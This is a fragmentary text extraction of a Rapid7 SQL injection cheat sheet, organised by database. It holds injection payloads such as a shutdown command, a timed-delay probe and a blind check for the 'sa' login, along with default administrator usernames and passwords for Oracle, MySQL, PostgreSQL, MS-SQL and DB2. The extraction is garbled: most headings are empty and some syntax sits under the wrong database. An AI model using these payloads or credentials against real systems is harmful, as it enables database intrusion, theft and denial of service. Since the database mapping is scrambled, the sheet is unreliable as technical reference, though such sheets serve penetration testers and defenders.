Professional Documents
Culture Documents
R7 SQL Injection Cheat Sheet.v1
R7 SQL Injection Cheat Sheet.v1
www.rapid7.com
@@version
Users
Tables
Database
Columns
Extending/Appending queries
Semicolon (;)
Running User
Injecting/Bypassing filters
Oracle
Grab version
Users
* from dba_users
Injecting Union
Tables
Running Command
Database
Columns
Running User
Loading Files
Adding user
DoS
1;shutdown
Fetching Fields
IBM DB2
Grab version
Users
Tables
Database
Quick Check
Columns
User Check
1+AND+USER_NAME()=dbo
Running User
Injecting Wait
1;waitfor+delay+0:0:10
MySQL
Check for sa
SELECT+ASCII(SUBSTRING((a.
loginame),1,1))+FROM+master..
sysprocesses+AS+a+WHERE+a.spid+=+@@
SPID)=115
Grab version
@@version
Users
* from mysql.user
Tables
Database
Columns
Running User
user()
Looping/Sleep
Default Usernames/Passwords
Oracle
scott/tiger, dbsnmp/dbsnmp
MySQL
mysql/<BLANK>, root/<BLANK>
PostgreSQL
postgres/<BLANK>
MS-SQL
sa/<BLANK>
DB2
db2admin/db2admin
PostgreSQL
Grab version
version()
Users
* from pg_user
Database
Running User
user;